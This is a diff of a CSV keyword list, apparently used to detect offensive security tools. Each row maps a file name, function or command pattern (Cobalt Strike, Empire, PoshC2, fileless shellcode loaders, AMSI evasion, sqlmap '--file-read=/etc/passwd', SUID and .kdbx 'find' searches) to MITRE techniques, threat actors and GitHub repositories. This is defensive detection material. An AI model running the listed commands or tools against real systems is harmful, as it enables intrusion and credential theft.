APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*File-Extensions-Wordlist.txt*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*fileless-elf-exec*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" -"*FilelessPELoader.cpp*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory 
- Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*FilelessPELoader.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*FilelessPELoader.vcxproj*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*FilelessPELoader-main*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*FilelessShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*FilelessShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - 
T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*FilelessShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*FilelessShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessPELoader.cpp*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessPELoader.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessPELoader.vcxproj*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - 
TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessPELoader-main*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID 
- IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*filemsf.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*--file-read=/etc/passwd*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*files/BindShell.exe*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*--file-read=/etc/passwd*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*files/BindShell.exe*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*files/team-edward.py*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*filezilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*filezilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*finalrecon.py --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*find . 
-name spring-beans*.jar*","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","0","N/A","N/A","4","335","106","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z" -"*find / * -4000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*find / * -perm -2000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*find / * -regextype egrep -iregex*\.kdbx*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*find_and_load_coerce_methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"*find / * -4000 -type f 
-print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find / * -perm -2000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find / * -regextype egrep -iregex*\.kdbx*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find_and_load_coerce_methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "*find_domain.sh *","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*find_payload(*","offensive_tool_keyword","cobaltstrike","generate 
CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*Find-4624Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-4648Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-4624Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-4648Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*FindAdminAccessComputers*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Find-AdminLogonScripts.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" -"*find-allvulns*","offensive_tool_keyword","poshc2","keywords from 
poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*find-allvulns*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Find-AmsiAstSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Find-AmsiPSTokenSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Find-AmsiSignatures.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"*Find-AppLockerLogs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-AVSignature*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-AppLockerLogs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 